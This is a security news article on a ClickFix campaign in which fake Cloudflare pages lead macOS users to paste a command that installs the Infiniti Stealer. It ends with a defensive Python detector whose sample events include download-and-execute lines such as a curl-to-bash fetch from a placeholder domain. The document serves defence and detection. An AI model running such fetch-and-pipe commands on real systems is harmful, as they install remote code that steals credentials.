Security researchers have identified a new ClickFix campaign that impersonates Cloudflare's browser verification interface to deliver the Infiniti Stealer — a Python-based infostealer — to macOS users. The attack chain is notable for its four-stage delivery pipeline and its specific targeting of Apple hardware users.
What Is ClickFix
ClickFix is a social engineering technique in which attackers present victims with fake error messages or CAPTCHA prompts that instruct users to manually copy and execute a command in their terminal or browser console. By leveraging the victim's own actions, the attack bypasses many automated security controls that would catch a traditional drive-by download.
The technique has been widely adopted by threat actors over the past year, applied across a range of lures including fake browser error pages, fake document viewers, and — in this latest campaign — Cloudflare's trusted browser integrity check UI.
The Cloudflare Impersonation Lure
Attackers in this campaign create convincing replicas of Cloudflare's "Checking your browser" / "Verify you are human" pages — the familiar interstitial page that Cloudflare displays before granting access to protected websites.
Victims arrive at these pages via malicious links distributed through phishing emails, compromised websites, or ad networks. The fake Cloudflare page instructs the user to complete a "manual verification step" by opening their Mac terminal and pasting a command. This is the ClickFix trigger.
Four-Stage Infection Chain
Stage 1: Fake Cloudflare CAPTCHA Page
The victim lands on a convincing Cloudflare-branded verification page. Unlike a real Cloudflare challenge (which completes automatically), this page instructs the user to open Terminal and paste a clipboard-injected command. The page automatically copies the malicious command to the clipboard when the user clicks the provided button.
Stage 2: Bash Script
The pasted command downloads and executes a Bash script from an attacker-controlled server. The script performs environment checks — verifying that the target is macOS and is not running in a sandbox — and gathers basic system information before proceeding to the next stage. If the environment check fails, the script exits silently to avoid detection.
Stage 3: Nuitka-Compiled Loader
The Bash script drops a Nuitka-compiled binary. Nuitka is a legitimate Python-to-C compiler that converts Python code into standalone native executables. By compiling with Nuitka, attackers produce a binary that evades detections written for Python scripts and is harder to statically analyze than plain .py files. The loader decrypts and executes the final payload.
Stage 4: Infiniti Stealer
The payload is Infiniti Stealer — a Python-based infostealer targeting macOS. Infiniti Stealer is designed to harvest:
- macOS Keychain credentials — system-stored passwords, Wi-Fi keys, and application credentials
- Browser data — saved passwords, cookies, and session tokens from Safari, Chrome, and Firefox
- Cryptocurrency wallet data — seed phrases and wallet files from popular software wallets
- System information — hardware identifiers, installed applications, and user account details
Stolen data is exfiltrated to attacker-controlled infrastructure. The stealer attempts to operate without triggering macOS System Integrity Protection (SIP) or Transparency, Consent, and Control (TCC) prompts by limiting its access to user-readable data stores rather than requesting elevated permissions.
macOS as a Growing Target
This campaign is part of a broader trend of infostealer campaigns pivoting toward macOS. Historically, infostealers primarily targeted Windows environments. However, the increasing prevalence of Macs in corporate environments — particularly in development, finance, and executive roles — has made macOS a lucrative target.
Cloudflare is a particularly effective impersonation lure because:
- It is one of the most recognized security brands
- Its browser verification pages appear on millions of websites daily
- Users have been conditioned to interact with Cloudflare challenges rather than question them
Detection & Defence
For end users (macOS):
- Never paste commands into Terminal from a webpage, regardless of how legitimate the page appears
- Cloudflare's real browser verification never requires terminal commands — it completes automatically in the browser
- Keep macOS and applications updated to benefit from the latest XProtect signatures
For security teams:
- Deploy endpoint detection capable of identifying Nuitka-compiled binaries and unusual Python execution patterns on macOS
- Monitor for outbound connections to recently registered or uncommon domains following user web browsing
- Block execution of unsigned binaries downloaded from the internet where policy permits
- Train users specifically on ClickFix social engineering — the manual terminal step is the clearest red flag
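The "unusual execution patterns" the security-team guidance calls for can be expressed as a process-lineage rule: a shell launched from a terminal app that fetches or decodes content and pipes it straight into an interpreter, which is exactly what the Stage 1 to Stage 2 hand-off looks like on an endpoint. The following is an added, illustrative detector (not code from the campaign analysis or from SecurityWeek); the event dictionary format, the `.invalid` domains and the list of terminal application names are constructed assumptions, not real telemetry.

```python
import re
import shlex

# Constructed sample process-execution events, loosely modelled on what an
# endpoint agent reports (parent app, image, full command line). Not real data.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "image": "/bin/bash",
     "cmdline": "bash -c 'curl -fsSL https://verify-example.invalid/check.sh | bash'"},
    {"parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "zsh -c 'echo aGVsbG8= | base64 -d | sh'"},
    {"parent": "Terminal", "image": "/usr/bin/git", "cmdline": "git status"},
    {"parent": "Google Chrome", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://update.example.invalid/manifest.json"},
    {"parent": "Terminal", "image": "/usr/bin/curl",
     "cmdline": "curl -O https://example.invalid/readme.txt"},
]

TERMINALS = {"Terminal", "iTerm2", "Warp", "Hyper"}       # assumed parent names
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"base64", "xxd"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript"}
PIPE_SPLIT = re.compile(r"\s*\|\s*")

def _inner_command(cmdline: str) -> str:
    """Return the script passed via `sh -c '...'`, if any, else the cmdline itself."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: fall back to the raw string
        return cmdline
    for i, tok in enumerate(argv[:-1]):
        if tok == "-c":
            return argv[i + 1]
    return cmdline

def _first_word(stage: str) -> str:
    """Program name of one pipeline stage, ignoring sudo, env assignments and paths."""
    parts = stage.split()
    while parts and ("=" in parts[0] or parts[0] == "sudo"):
        parts.pop(0)
    return parts[0].rsplit("/", 1)[-1] if parts else ""

def is_clickfix_pattern(event: dict) -> bool:
    """True when a terminal-spawned shell downloads or decodes and then pipes
    the result into an interpreter (e.g. `curl ... | bash`)."""
    if event["parent"] not in TERMINALS:
        return False
    stages = [_first_word(s) for s in PIPE_SPLIT.split(_inner_command(event["cmdline"]))]
    return any(w in DOWNLOADERS | DECODERS and any(x in INTERPRETERS for x in stages[i + 1:])
               for i, w in enumerate(stages))

def scan(events) -> list:
    """Return the command lines of all events matching the ClickFix pattern."""
    return [e["cmdline"] for e in events if is_clickfix_pattern(e)]
```

The rule deliberately ignores a plain `curl -O` of a file and a browser's own network helper, so it fires on the download-and-execute shape rather than on every use of curl.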
Source: SecurityWeek